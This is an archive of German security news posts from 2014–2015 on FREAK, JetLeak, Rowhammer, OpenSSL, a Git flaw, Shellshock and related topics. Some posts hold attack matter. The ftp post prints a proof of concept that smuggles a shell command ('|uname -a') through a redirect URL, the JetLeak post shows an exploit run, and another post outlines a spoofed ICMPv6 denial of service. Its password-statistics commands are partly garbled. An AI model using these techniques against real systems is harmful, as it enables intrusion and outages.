    This vulnerability exists within hardware and cannot be mitigated by just upgrading software. The following are the two widely known mitigations for the Row Hammer issue: - Two times (2x) refresh – is a mitigation that has been commonly implemented on server based chipsets from Intel since the introduction of Sandy Bridge and is the suggested default. This reduces the row refresh time by the memory controller from 64ms to 32ms and shrinks the potential window for a row hammer, or other gate pass type memory error to be introduced. - Pseudo Target Row Refresh (pTRR) – available in modern memory and chipsets. pTRR does not introduce any performance and power impact. - Increased Patrol Scub timers – systems that are equipped with ECC memory will often have a BIOS option that allows the administrator to set an interval at which the CPU will utilize the checksum data stored on each ECC DIMM module to ensure that the contents of memory are valid, and correcting any bit errors that may have been introduced. The number of correctable errors will vary based on architecture and ECC variant. Administrator’s may consider reducing the patrol scrub timers from the standard 20 minute interval to a lower value. Server-based chipsets starting with the Intel Ivy Bridge (IVB) chipset provide support for pTRR.

Referenzen




protect from ElasticSearch RCE (CVE-2015-1427) / JetLeak with Naxsi

2015.03.10

in eigener sache




OpenSSL Cookbook 2nd Edition jetzt verfügbar

2015.03.04

openssl-cookbook

FeistyDuck hat das OpenSSL-Cookbook von Ivan Ristic in der 2. Edition veröffentlicht. Auf knapp 100 Seiten werden die am häufigsten verwendeten OpenSSL-Features und Kommandos erklärt; das OpenSSL-Cookbook ist ein Excerpt des Buchs Bulletproof SSL and TLS des gleichen Autors und steht zum kostenlosen Download als PDF, EPub, Mobi oder als HTML-Version zum Online-Lesen zur Verfügung.

Aus dem Changelog:

  • neues Kapitel "Testing with OpenSSL" mit Fokus auf Server-Tests und Bewertung der Ergebnisse
  • neues Kapitel "Recommended Configuration" mit einer Liste empfohlener Cipher-Suites
  • neues Kapitel "Creating a Private Certification Authority" mit einer detaillierten Anleitung zur Erstellung von CAs
  • Updates für das Kapitel "SSL/TLS Deployment Best Practices"

Inhaltsverzeichnis:

  1. OpenSSL
    • Getting Started
    • Key and Certificate Management
    • Configuration
    • Creating a Private Certification Authority
  2. Testing with OpenSSL
  3. SSL/TLS Deployment Best Practices
    • Private Key and Certificate
    • Configuration
    • Performance
    • Application Design
    • Validation
    • Advanced Topics

Referenzen




FREAKShow - Lücke in TLS ermöglich MITM durch Cipher-Downgrades

2015.03.03

Eine Gruppe von Crypto-Forschern vom INRIA-Institut, Microsoft Research und IMDEA hat eine Lücke in verschiedenen TLS-Implementierungen gefunden (u.a. Android-Browser und Apple's Safari) die durch ein Cipher-Downgrade auf Export-Grade-Ciphers die Verschlüsselung schwächen und damit einen MITM-Angriff ermöglichen kann. In der OpenSSL-Server-Implementierung die Unterstützung von Export-Grade Cipher-Suites zwar per default deaktiviert, trotzdem wurden bei einer Analyse 12% der Alexa Top 1 Mio Webseiten gefunden, bei denen diese Lücke ausgenutzt werden können.

Support for these weak algorithms has remained in many implementations such as OpenSSL, even though they are typically disabled by default; however, we discovered that several implementations incorrectly allow the message sequence of export ciphersuites to be used even if a non-export ciphersuite was negotiated.

Ironically, many US government agencies (including the NSA and FBI), as well as a number of popular websites (such as the OAuth SDK server of Facebook, IBM, or Symantec) enable export ciphersuites on their server - by factoring ther 512-bit RSA modulus, we can impersonate them to vulnerable clients. (src: smacktls.com)

Matthew Green erklärt in einem excellenten Blogpost Hintergründe und Fakten zur Lücke und auch, warum eine große Anzahl der SSL/TLS-Sites anfällig sind: Akamai als eines der größten CDNs war von der Lücke betroffen, hat das Problem aber mittlerweile beseitigt.

Based on some recent scans by Alex Haldeman and Zakir Durumeric at University of Michigan, it seems that export-RSA is supported by as many as 5.2% 36.7% (!!!!) of the 14 million sites serving browser-trusted certs. The vast majority of these sites appear to be content distribution networks (CDN) like Akamai. Those CDNs are now in the process of removing export grade suites.

While the numbers are impressive, the identity of those sites is a bit more worrying. They include U.S. government sites like www.nsa.gov (Oy vey), www.whitehouse.gov and www.irs.gov. It turns out that the FBI tip reporting site (tips.fbi.gov) was also vulnerable.

Vulnerable sites also included connect.facebook.net, which is the source of the famous Facebook 'Like' button which shows up on secure web pages all over the Internet. Attacks on these connections could lead to content injection on a huge number of web pages.

(Facebook have updated their configuration as a result of this work.) (src: Matthew Green)

Analyse weltweiten TLS-Infrastruktur via freakattack.com

freak

Betroffene Software

Server:

  • OpenSSL in ungewöhnlichen Konfigurationen (Export-Grade-Ciphers sind per default deaktiviert)
  • Windows Server 2003-2012R2

Clients

  • Android-Browser
  • Safari (OSX, Linux, Windows)
  • Internet Exporer
  • Chrome @ Android
  • Blackberry Browser
  • Opera

Nicht betroffen:

  • OpenSSL in der Standardvariante
  • LibreSSL
  • Chrome @ Windows, OSX, Linux
  • Firefox

Tests

lokaler Schnelltest:

$ nmap --script ssl-enum-ciphers -p 443 sohu.com|grep EXPORT -l |wc -l

# benötigt EXPORT-Ciphers-Support auf dem Client
$ openssl s_client -connect example.com:443 -cipher EXPORT 2>&1 > /dev/null | grep "handshake failure" > /dev/null && echo "OK" || echo "VULNERABLE"

Referenzen




JetLeak - Jetty Webserver leaked shared buffers (CVE-2015-2080)

2015.02.28

tl; dr: if you run jetty behind nginx you're probably safe, else upgrade

jetleak

Gotham Digitla Science discovered a nice vuln in the Java-based Jetty-Webserver, allowing an remote attacker to read shared memory from the process. A testscript is available and is is possible to create a working POC out of the information available; the jetty-team released an adivisory too that contains a nice POC as well:

[ door@vakt :~/exploits/remote] > ./jetleak.sh 8181

-- Normal Request --
HTTP/1.1 404 Not Found
Cache-Control: must-revalidate,no-cache,no-store
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 292
Connection: close
Server: Jetty(9.2.8.v20150217)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/>
<title>Error 404 </title>
</head>
<body>
<h2>HTTP ERROR: 404</h2>
<p>Problem accessing /test/dump/info. Reason:
<pre>    Not Found</pre></p>
<hr /><i><small>Powered by Jetty://</small></i>
</body>
</html>


-- Bad Cookie --
HTTP/1.1 400 Illegal character 0x7 in state=HEADER_IN_NAME in 'GET /test/dump/in... localhost\nCoo\x07<<<kie: \x07\n\n>>>e: application/x-...\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
Content-Length: 0
Connection: close
Server: Jetty(9.2.8.v20150217)

affected Versions:

  • 9.2.3 to 9.2.8

mitigations

  • if you run your jetty behind a reverse proxy like nginx you are probably safe; we found nginx blocking the request, but apache happily forwarding everything to jetty
  • updates for v9.2.9 are available

references




Nginx goes HTTP/2

2015.02.26

http2-approved

Das Nginx-Team hat in einem Blogeintrag angekündigt, HTTP/2 bis Ende des Jahres zu implementieren.

Since the IETF announced last week that the HTTP/2 specification has been finalized and will be published as an RFC, many customers have asked about our plans to support the new protocol in our open source nginx and commercial NGINX Plus products. We’re pleased to announce that we plan to release versions of nginx and NGINX Plus by the end of 2015 that will include support for HTTP/2.

Bis dahin kann man weiterhin SPDY/3.1 nutzen, dass von allen großen Desktop- und Mobile.Browsern (Chrome, Firefox, IE ab v11, Safari ab v8) unterstützt wird.

Referenzen




HTTP/2 is Done

2015.02.18

The IESG has formally approved the HTTP/2 and HPACK specifications, and they’re on their way to the RFC Editor, where they’ll soon be assigned RFC numbers, go through some editorial processes, and be published. src: Mark Nottingham

Das zugehörende RFC wird in den nächsten Tagen erwartet; sofern es serverseitige Implementierungen gibt werden wir darüber i nformieren. In einem Wiki-Eintrag der HTTP/2 - Working-Group werden mehr als 30 aktuelle Client/Server - Implementierungen gelistet, so wird HTTP/2 bereits von Chrome, Firefox, Twitter (Client/Server), Golang oder Jetty in der finalen oder einer der letzten Versionen unterstützt.

Passend dazu auch die Ankündigung von Google (Hello HTTP/2, Goodbye SPDY), in zukünftigen Chrome-Versionen nur noch HTTP/2 zu unterstützen.

http-2




Hacking as a Service - Case Study

2015.02.17

haas

tl;dr: DROP 64.39.96.0/20

Andy Cuff von Computer Network Defence hat aufgrund eines massiven und aggressiven Scans seitens Qualys' Cloud-Scannern diesen Dienst und die stattfindenden Scans näher analysiert and kommt zu dem Ergebnis, dass die Scans u.a. User/Passwort-Kombinationen durchprobieren (Brute-Force) und damit potentiell in Dienste eindringen können, und unberechtigte Dritte die Scans beauftragen können. Die beiden Punkte kombiniert eignet sich das Qualys-Angebot für Angreifer, die unerkannt Webseiten und Netze scannen und einfache Lücken finden wollen.

As with most public facing networks, we are frequently targeted and scanned, though the Qualys scan violated us more than most. We do rely heavily on instinct and this one put the analysts spider senses on alert.
...
The Security as a Service (SAAS) vendors must take responsibility for their actions and be more effective in vetting their supposed clients prior to scanning hosts. It's not exactly rocket science to verify domains and IP addresses. With Qualys, I subscribed and was offered 10 free scans and all I had to do was state my name, my company name and verify my email address. Qualys state "Your information will be kept private!" They didn't even require credit card details. I'd be interested to know if they disabled his account.

Referenzen




End of the m0n0wall project

2015.02.16

Src: m0n0.ch/wall/end_announcement.php

Dear m0n0wall enthusiasts,

on this day 12 years ago, I have released the first version of m0n0wall to the
public. In theory, one could still run that version - pb1 it was called - on a
suitably old PC and use it to control the Internet access of a small LAN (not
that it would be recommended security-wise). However, the world keeps turning,
and while m0n0wall has made an effort to keep up, there are now better solutions
available and under active development.

Therefore, today I announce that the m0n0wall project has officially ended. No
development will be done anymore, and there will be no further releases.

The forums and the mailing list will be frozen at the end of this month. All the
contents of the website, repository, downloads, mailing list and forum will be
archived in a permanent location on the web so that they remain accessible
indefinitely to anyone who might be interested in them.

m0n0wall has served as the seed for several other well known open source
projects, like pfSense, FreeNAS and AskoziaPBX. The newest offspring, OPNsense
(https://opnsense.org), aims to continue the open source spirit of m0n0wall
while updating the technology to be ready for the future. In my view, it is the
perfect way to bring the m0n0wall idea into 2015, and I encourage all current
m0n0wall users to check out OPNsense and contribute if they can.

Finally, I would like to take this opportunity to thank everyone who has been
involved in the m0n0wall project and helped in some way or another - by
contributing code, documentation, answering questions on the mailing list or the
forum, donating or just spreading the word. It has been a great journey for me,
and I'm convinced that even now that it has come to an end, the m0n0wall spirit
will live on in the various projects it has spawned.

Manuel Kasper
15 February 2015



Today I Am Releasing Ten Million Passwords

2015.02.11

10miopw

Mark Burnett hat 10 Millionen Passwörter veröffentlicht, primär um als Quelle für weitere Forschung zu dienen:

Although researchers typically only release passwords, I am releasing usernames with the passwords. Analysis of usernames with passwords is an area that has been greatly neglected and can provide as much insight as studying passwords alone. ...

Furthermore, I believe these are primarily dead passwords, which cannot be defined as authentication features because dead passwords will not allow you to authenticate. The likelihood of any authentication information included still being valid is low and therefore this data is largely useless for illegal purposes.

Die Daten sind älteren Datums und teilweise verfremdet; so wurden bei Emails der Domain-Teil enfernt, um potentiell noch aktive Logins zu schützen. In einem FAQ erklärt Mark Burnett näheres zur Herkunft der Daten, wie diese gesammelt und analysiert wurden.

Kurz nach Veröffentlichung tauchten erste Analysen der Datensätz auf HN auf:

# liste der am häufigsten verwendeten Passwörter
$ export LC_ALL='C'
$ awk '{ print $2 }' 10-million-combos.txt | tr 'A-Z' 'a-z' | sort | uniq -c | sort -nr | head -n 20
    55893 123456
    20785 password
    13582 12345678
    13230 qwerty
    11696 123456789
    10938 12345
    6432 1234
    5682 111111
    4796 1234567
    4191 dragon
    3845 123123
    3734 baseball
    3664 abc123
    3655 football
    3330 monkey
    3206 letmein
    3136 shadow
    3126 master
    3050 696969
    3002 michael

# liste der am häufigsten verwendeten Logins

$ export LC_ALL='C'
$ 0-million-combos.txt | tr 'A-Z' 'a-z' | sort | uniq -c | sort -nr | head -n 20 3044 infouniq -c | sort -nr | head -n 20
  2119 admin
  1323 michael
  1113 robert
  1095 2000
  1049 john
  1041 david
  967 null
  940 richard
  922 thomas
  901 chris
  866 mike
  843 steve
  832 dave
  816 daniel
  812 andrew
  797 george
  765 james
  735 mark
  730 dragon

Referenzen




OpenSSL 1.0.2 wirft seine Schatten voraus

2015.01.14

In einer Mail an [openssl-dev] hat das OpenSSL - Team das Release von OpenSSL 1.0.2 für Ende Januar angekündigt:

  • OpenSSL 1.0.2 will be released on Thursday 22nd January.

Weitere Änderungen betreffen Bugfixes und Umformatierung des Codes:

  • There will be new releases made available on Thursday 15th January for versions 1.0.1, 1.0.0 and 0.9.8. These will be bug fix only releases to address build problems with the current releases on the Windows and OpenVMS platforms. No new security issues will be included in these releases.

  • The whole OpenSSL codebase will be reformatted according to the newly published OpenSSL coding style (https://www.openssl.org/about/codingstyle.txt) on Wednesday 21st January. This will include the master, 1.0.2, 1.0.1, 1.0.0 and 0.9.8 branches. See [1] for further background information.

  • Between the releases being made available on 15th January and the code reformat on 21st January the 1.0.1, 1.0.0 and 0.9.8 branches in the public repository will be frozen and no changes will be made (except in the case of very high priority fixes).




The 90s called: Lücke im Windows Telnet-Dienst erlaubt Remote Code Execution

2015.01.14

In einem Advisory warnt Microsoft vor einer Lücke im Telnet-Dienst, die u.U. zu Remote Code Execution führen kann.

Per default ist dieser Dienst nur auf Windows Server 2003 installiert, aber nicht aktiviert. Microsoft empfiehlt betroffenen Admins, die Systeme umgehend zu patchen.

Eine kurze Suche offenbarte knapp 200.000 potentiell angreifbare Microsoft-Telnet-Server, vornehmlich in Korea, China, USA und Russland.

shodan

Mitigating Factors

The following mitigating factors may be helpful in your situation:

  • By default, Telnet is installed but not enabled on Windows Server 2003. Only customers who enable this service are vulnerable.
  • By default, Telnet is not installed on Windows Vista and later operating systems. Only customers who manually install and enable this service are vulnerable.

Workarounds

Microsoft has not identified any workarounds for this vulnerability.

Referenzen




Hacking a Bitcoin Exchange

2015.01.13

In einem Pentest zeigt Egor Homakov, wie er eine Bitcoin-Börse in einem mehrstufigen Angriff übernimmt und Bitcoins stehlen kann.

Egor Homakov at it's best!

bitcoins

Referenzen




Lücke in Git und Mercurical betrifft OSX und Windows

2014.12.19

Github berichtet über eine kritische Lücke im Git-Client, die vornehmlich OSX- und Windows-User betrifft, da die Lücke ausnutzbar ist, wenn Dateisysteme benutzt werden, die Case-Insensitive sind.

HN hat eine gute Kurzusammenfassung:

"Short panic summary: your git/hg remotes can get code execution on your machine when you clone/pull if you are on OSX or Windows.

Summary: on case-insensitive/normalizing filesystems (default on OSX and Windows) it's possible for .git/config to be overwritten by the tree, probably due to a case-sensitive sanity check when the actual file is insensitive. .git/config can contain arbitrary commands to be run on certain events/as aliases, so it leads to code execution. This is a risk when you get a tree from a third party, so on pull/fetch+checkout/clone...

There's an analogous vulnerability in Mercurial.

Update, then run git --version and make sure it's one of v1.8.5.6, v1.9.5, v2.0.5, v2.1.4, or v2.2.1. And be careful when pulling/cloning from third-parties."


Atlassian, Entwickler des populären SourceTree - Git-Tools, hat bereits ein Advisory verschickt und bietet Update-Infos für Windows- und Mac/OSX an.


Betroffene Git-Versionen:

  • v1.8.5.5 oder kleiner
  • v1.9.4
  • v2.0.4
  • v2.1.4
  • v2.2.0

Betroffene Mercurical-Verisionen (siehe):

  • 3.2.2

Referenzen




reCAPTCHA, NoCAPTCH, BreakCAPTCHA

2014.12.05

Google hat vor einigen Tagen ein neues Captcha-System vorgestellt

captcha




HTTP vs HTTPS - Speedtest

2014.12.04

Die Webseite httpvshttps.com misst die Geschwindigkeit eines Seitenaufbaus von HTTP vs HTTPS; das Ergebnis ist verblüffend: mit aktiviertem SPDY ist der Webseitenaufbau via HTTPS um den Faktor 2-8 mal schneller als mit HTTP (YMMV)

http https

Referenzen




The sad state of server-side TLS Session Resumption implementations

2014.11.18

Tim Taubert vom Mozilla-Team hat sich die SSL Session Ticket -Implementierungen populärer Webserver und Reverse-Proxies (Apache, Nginx, HA-Proxy) analysiert und festgestellt, dass die gängige Methode der Verwendung eines Session-Caches / Session-Tickets zu Problemen bei der Verwendung von PFS-Cipher-Suites führen kann, da abgelaufenen Session-Tickets bei keiner Implementierung aus dem Session-Store entfernt werden:

"One of the most important features to improve user experience for visitors accessing your site via TLS is session resumption. Session resumption is the general idea of avoiding a full TLS handshake by storing the secret information of previous sessions and reusing those when connecting to a host the next time. This drastically reduces latency and CPU usage.

Enabling session resumption in web servers and proxies can however easily compromise forward secrecy. "

Ivan Ristic erklärt in einem Reddit-Kommentar, dass das Problem durch die Verwendung von OpenSSL ensteht:

"To add to the post, the reason neither Apache nor Nginx implement session tickets properly is because both off-load the functionality to OpenSSL. OpenSSL generates a random ticket key on startup, while there is only one process. Apache and Nginx are multi-process servers, where children fork from the initial master process. That's the reason why the ticket keys are not rotated -- OpenSSL doesn't know anything about the actual architecture (of Apache and Nginx). Both web servers really need to implement session ticket handling directly and incorporate rotation into it."

Als Referenz wird ein Blogpost von Twitter genannt, die ein eigenes System von rotierenden Session-Keys implementiert haben:

  • To do so, we have a set of key generator machines, of which one is the leader. The leader generates a fresh session ticket key every twelve hours and zeroes old keys after thirty-six hours.
  • Every five minutes, our frontends fetch the latest ticket keys from a key generator machine via SSH.
  • When a new ticket key K is available, we don’t want to start encrypting new tickets with it until we expect that each frontend has a copy of K and can decrypt those tickets.
  • In general, frontends will have three ticket keys available: the current key, and the two previous keys. They can decrypt session tickets using any of those three. When a client resumes a session using one of the previous keys, a frontend will finish the abbreviated handshake and assign a new session ticket using the current key."

Referenzen




CREAM: the scary SSL attack you’ve probably never heard of

2014.11.13

Tony Arcieri erklärt in diesem Artikel ausführlich einen Timing/Side-Channel - Angriff auf die AES-Implementierung von OpenSSL aus dem Jahre 2005.

"CREAM is a cache timing attack that was used against OpenSSL’s implementation of AES. It allows an attacker on one computer to extract AES keys from another computer over a network. The attack works by measuring round trip timings of known plaintexts encrypted under AES by OpenSSL running on the victim’s computer.

That’s right: simply by measuring minute timing discrepancies over a network, an attacker could extract AES keys from another computer, making it almost as severe as Heartbleed. These timing discrepancies occurred because AES uses a design element known as an S-box, which is effectively a table whose elements we look up based on the AES key. Unfortunately, CPUs are extremely eager to optimize these sorts of lookups with caches, and because the lookups are ultimately based on the key, they introduce what’s known as a side-channel."

cream attack on openssl

Referenzen




Remote code execution via ftp on Mac OS 10.10 (Yosemite), NetBSD, FreeBSD

2014.10.28

Durch eine Lücke im FreeBSD - Fftp - Client lässt sich mißbrauchen, Code auf dem Rechner des Angegriffenen auszuführen. Ausgentzt werden kann die Lücke, wenn der FTP-Client eine Datei von einer http-URL heruntergeladen werden soll; auf der openwall-mailinglist ist ein enstprechender Beispielcode veröffentlicht:

$ pwd
     /var/www/cgi-bin
     a20$ ls -l
     total 4
     -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
     -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a

$ cat redirect
     #!/bin/sh
     echo 'Status: 302 Found'
     echo 'Content-Type: text/html'
     echo 'Connection: keep-alive'
     echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
     echo
$ ftp http://localhost/cgi-bin/redirect

   Trying ::1:80 ...
   ftp: Can't connect to `::1:80': Connection refused
   Trying 127.0.0.1:80 ...
   Requesting http://localhost/cgi-bin/redirect
   Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
   Requesting http://192.168.2.19/cgi-bin/|uname%20-a
       32      101.46 KiB/s
   32 bytes retrieved in 00:00 (78.51 KiB/s)
   NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
   ADT 2014

$

Betroffen sind davon NetBSD, FreeBSD und OSX 10.10; Linux-Systeme sind davon betroffen, wenn der FTP-Client "tnftp" benutzt wird, der per default nicht installiert ist.

Ein POC zum Testen steht bereit.




All Your Data Are Belong To US: iCloud speichert ungefragt lokale Daten

2014.10.27

all-your-data.png

Jeffrey Paul hat herausgefunden, dass ab OSX 10.10 Yosemite alle geöffneten/zwischengespeicherten Dokumente ungefragt in der iCloud abgelegt werden, auch wenn die Datei explizit nicht auf dem iDrive gespeichert wurde; dies betrifft alle Apple-Programme (TextEdit, Keynote, Pages usw), aber auch Programme anderer Anbieter, die Dateien zwischenspeichern:

"This happens for all applications (think iA Writer, Pixelmator, et c) that had saved application state. Any open and yet-unsaved document within an app is now silently and automatically uploaded to iCloud Drive, and, by extension, the government.

This is unacceptable.

Apple has taken local files on my computer not stored in iCloud and silently and without my permission uploaded them to their servers - across all applications, Apple and otherwise."

Nach Angabe eines Knowledgebase - Artikels von Apple ist dies ein dokumentiertes Verhalten.

Neben den Daten aus geöffneten Dokumenten werden auch Email-Adressen an Apple gesendet:

"It would appear that iCloud is synchronizing all of the email addresses of people you correspond with, even for non-iCloud accounts, to their recent addresses service. This means that names and email addresss that are not in iCloud contacts, not synchronized to your device, and only available in an IMAP-accessed inbox are now being sent to Apple, silently."

Referenz




don't run 'strings' on untrusted files (lcamtuf)

2014.10.26

Michael Zalewski, aka "lcamtuf", hat eine Schwachstelle in der libbfd der GNU binutils entdeckt, die u.a. von den Programmen "strings" und "objdump" benutzt wird; durch diese Schwachstelle ist es u.U. möglich, in Binaries Code zu verstecken, der durch die Analyse mittels "strings" zur Ausführung kommt:

"The 0x41414141 pointer being read and written by the code comes directly from that proof-of-concept file and can be freely modified by the attacker to try overwriting program control structures. Many Linux distributions ship strings without ASLR, making potential attacks easier and more reliable. " - (lcamtuf)

Workaround

  • strings -a FILE : die Option "-a" führt "strings" unter Umgehung der libbfd aus

Referenzen




SSL Config Generator von Mozilla

2014.10.23

Das Mozilla-Team hat einen SSL Config Generator veröffentlich, mitdem sich SSL-Setups und Cipher-Suites für Apache, Nginx und HAProxy erstellen lassen.

Neben den verschiedenen Servern lassen unterschiedliche Profile auswählen (Modern, Intermediate, Old), die im Mozilla-Guide Security/Server Side TLS näher erläutert werden.

mozilla ssl generator




LibreSSL 2.1.1 released

2014.10.16

Das openBSD-Team hat, wenige Tage nach LibreSSL 2.1.0, die nächste Version mit LibreSSL 2.1.1 veröffentlicht und reagiert damit auf den Poodle-Bug.

Wichtigste Neuerung: der Support für SSLv3 ist komplett eingestellt; interessant hierbei die zugehörende Commit-Message

Fuck it. No SSLv3; not now, not ever. The API of the future will only support the protocols of the future. (Perhaps a bit late in burning this bridge entirely, but there's no time like the present, esp. with other players now leaning against back compat.)

Referenzen




LibreSSL 2.1.0 released

2014.10.13

am 12. Oktober wurde LibreSSL 2.1.0 veröffentlicht, downloads stehen auf den Mirrors zur Verfügung.

Eine interessante Neuerung betrifft den Linux-Kernel: ab Version 3.17 greift LibreSSL 2.1.0 auf den neuen Syscall getrandom() zu, der im Laufe der Diskussionen der OpenBSD-Entwicklern mit den Kernel-Entwicklern eingeführt wurde, um Linux eine stabilere Grundlage für Zufallszahlen zu ermöglichen. [link]

ReleaseNotes / Changelogs stehen nicht zur Verfügung, das git-log des LibreSSL-Repos gibt aber einigen Aufschluß über die Änderungen; ein Kommentar auf Reddit gibt einen kurzen Überblick:

2.1.0 represents the first portable snapshot for what will eventually become the version included with OpenBSD 5.7.

- support for automatic ephemeral EC keys
- lots of memory leaks / overflow checks in error cases are fixed
- The TLS padding extension (that works around bugs in F5 terminators) is off by default
- support for getrandom(2) on Linux 3.17
- the NO_ASM macro is no longer being set, providing the first bits toward enabling other asm.



SPHINCS: practical stateless hash-based signatures

2014.10.09

sphincs

Aus der beliebten Reihe "Post-Quantencomputer-Kryptographie (fefe)":

"SPHINCS-256 is a high-security post-quantum stateless hash-based signature scheme that signs hundreds of messages per second on a modern 4-core 3.5GHz Intel CPU. Signatures are 41 KB, public keys are 1 KB, and private keys are 1 KB. SPHINCS-256 is designed to provide long-term 2128 security even against attackers equipped with quantum computers. Unlike most hash-based signature schemes, SPHINCS-256 is stateless, allowing it to be a drop-in replacement for current signature schemes."

SRC: http://sphincs.cr.yp.to/




Ghost in the ShellShock: Yahoo gehackt

2014.10.06

tl;dr: Whitehat beobachted Blackhats bei der Übernahme von Servern im Yahoo-Netzwerk.

Yahoos Antwort

"Howdy, Hacker News. I’m the CISO of Yahoo and I wanted to clear up some misconceptions. Earlier today, we reported that we isolated a handful of servers that were detected to have been impacted by a security flaw. After investigating the situation fully, it turns out that the servers were in fact not affected by Shellshock.

Three of our Sports API servers had malicious code executed on them this weekend by attackers looking for vulnerable Shellshock servers. These attackers had mutated their exploit, likely with the goal of bypassing IDS/IDP or WAF filters. This mutation happened to exactly fit a command injection bug in a monitoring script our Sports team was using at that moment to parse and debug their web logs.

Regardless of the cause our course of action remained the same: to isolate the servers at risk and protect our users' data. The affected API servers are used to provide live game streaming data to our Sports front-end and do not store user data. At this time we have found no evidence that the attackers compromised any other machines or that any user data was affected. This flaw was specific to a small number of machines and has been fixed, and we have added this pattern to our CI/CD code scanners to catch future issues.

As you can imagine this episode caused some confusion in our team, since the servers in question had been successfully patched (twice!!) immediately after the Bash issue became public. Once we ensured that the impacted servers were isolated from the network, we conducted a comprehensive trace of the attack code through our entire stack which revealed the root cause: not Shellshock. Let this be a lesson to defenders and attackers alike: just because exploit code works doesn’t mean it triggered the bug you expected! "

Links:




Who.is the Harlem Shake

2014.09.24

who.is, MToolbox.org und womöglich weitere, populäre DNS-Query-Webseiten sind einer lustigen XSS-Attacke zum Opfer gefallen: Die Webseiten tanzten den Harlem-Shake, nachdem jamie Hankins die DNS-TXT - Records dazu benutzt hat, einen persistenten XSS-Hack unterzubringen; dies ist kein Fehler im DNS-Protokoll, sondern bei den anfälligen Webseiten, die den User-Input nicht vernünftig sanitizen.

Never trust user input

nuff said

Achtung: lautes Audio, kann bei > 40jährigen das Gefühl athmosphärischer Störungen verursachen

Referenzen




Keyless SSL von CloudFlare: Private Privat-Keys

2014.09.23

keyless-ssl

CloudFlare hat Keyless SSL angekündigt, ein Verfahren/Feature, bei dem Kunden ihre SSL-Private-Keys nicht mehr an Cloudlfare übermitteln müssen, sondern einen Keyserver in eigener Infrastruktur betreiben können. Keyless SSL ist sowohl mit RSA- als auch mit DH/-Cipher-Suites (DHE/ECDHE) möglich, d.h. PFS für ältere und moderne Browser kann weiterhin angeboten werden. Ein ausführlicher Blogpost ( Keyless SSL: The Nitty Gritty Technical Details ) erläutert die technischen Details.

Ein Post auf HN fast die Pros und Cons der neuen Lösung zusammen:

Let's first see what the problem is with the old method, storing the private key on the Cloudflare server:

  1. Cloudflare can read all traffic.
  2. Cloudflare can read traffic they can intercept
  3. Anyone able to break into Cloudflare, physically or technically (or legally, hello NSA!), has the same capabilities.

Now we implement this new system:

  1. Cloudflare can still read all traffic.
  2. They can no longer passively read any traffic
  3. Anyone hacking Cloudflare is now limited in the same way Cloudflare is (so the same as point number two).

So far the security concerns. Now as for speed and DDoS mitigation

  • Cloudflare now needs to query an external server for every https connection... it all adds up and in the end you notice that pages need to load, even if only for a sec.
  • The SSL termination point is now nearer to the client, as Cloudflare has datacenters all around the world.
  • Cloudflare is still useful for mitigating attacks, just like with normal http traffic.
  • Session reuse makes this somewhat less of a pain, as the keyserver need not be queried for repeated https connections. We'd need to see numbers to know how much of a win this is, though. In any case, it's never faster than not having the keyserver.

In conclusion, you have three options:

  • Don't use Cloudflare. Fastest website, but risk of DDoS.
  • Old-style Cloudflare https setup: handing over your keys. DDoS risk mitigated.
  • New technique: providing keyservers. Slightly slower than the old style, but with a tiny security advantage that might help with either management or rare kinds of high-profile attacks.

Die folgenden Bilder illustrieren den Handshake für RSA und DH-Cipher-Suites:

keyless-ssl

keyless-ssl


Referenzen




OpenSSL Development Team releases first public security policy

2014.09.08

Das OpenSSL-Team hat eine Security-Policy veröffentlicht, in der die Entwickler darauf eingehen, wie Sicherheitslücken oder andere Probleme mit OpenSSL-Tools und Bibliotheken an das Team gemeldet und von diesem dann abgearbeitet werden.

"We have an email address which can be used to notify us of possible security vulnerabilities. A subset of OpenSSL team members receive this mail, and messages can be sent using PGP encryption. Full details are at https://www.openssl.org/news/vulnerabilities.html

When we are notified about an issue we engage resources within the OpenSSL team to investigate and prioritise it. We may also utilise resources from the employers of our team members, as well as others we have worked with before."

Referenzen




Popping a shell on the Oculus developer portal

2014.09.01

Aus dem Blog

"It's not every day you find a CSRF-RCE, where sending an admin to a malicious webpage gives you a shell on their server, but that's what I discovered while exploring the security of the Oculus developer portal." (Jon of Bitquark)

mehr lesen

oculus hack

Referenz




DoS attacks (ICMPv6-based) resulting from IPv6 EH drops

2014.08.22

Fernando Gont zeigt in einer Mail an FullDisclosure einen sehr simplen Weg, um mittels eines IMCPv6 - Pakets, erzwungener Fragmentierung und gespoofter Sendeadresse einen DoS zwischen Servern (oder BGP-Routern) zu erzwingen.

1) It is known that filtering of packets containing IPv6 Extension
    Headers (including the Fragment Header) is widespread (see our I-D above)

2) Let us assume that Host A is communicating with Server B, and that
    some node filters fragments between Host A and Server B.

3) An attacker sends a spoofed ICMPv6 PTB to server B, with a "Next Hop
    MTU<1280), in the hopes of eliciting "atomic fragments" (see
   <http://tools.ietf.org/rfc/rfc6946.txt>) from now on.

4) Now server B starts sending IPv6 atomic fragments... And since they
   include a frag header (and in '2)' above we noted that frags are dropped
   on that path), these packets get dropped (i.e., DoS).

Referenzen




Google-Ranking für HTTPS-Seiten verbessert

2014.08.20

Google bezieht HTTPS-Verschlüsselung für Webseiten seit dem August 2014 mit in das Ranking für die Suchmaschine ein.

"For these reasons, over the past few months we’ve been running tests taking into account whether sites use secure, encrypted connections as a signal in our search ranking algorithms. We’ve seen positive results, so we’re starting to use HTTPS as a ranking signal. For now it's only a very lightweight signal—affecting fewer than 1% of global queries, and carrying less weight than other signals such as high-quality content—while we give webmasters time to switch to HTTPS. But over time, we may decide to strengthen it, because we’d like to encourage all website owners to switch from HTTP to HTTPS to keep everyone safe on the web." Google Online Security Blog

Referenzen




Buch: Bulletproof SSL and TLS verfügbar

2014.08.19

Das seit Februar diesen Jahres in Auszügen erhältliche Buch "Bulletproof SSL and TLS" von Ivan Risitic ist jetzt als Printversion lieferbar.

Das Buch liefert einen Überblick über die aktuelle SSL/TLS-Landschaft, gibt Einblicke in Setup und Betreiben einer PKI und geht detailliert auf (Open)SSL-Deployments in Hinblick auf Performance, Sicherheit und Einsatz bei populären Webserver/Applicationserver-Technologien ein.

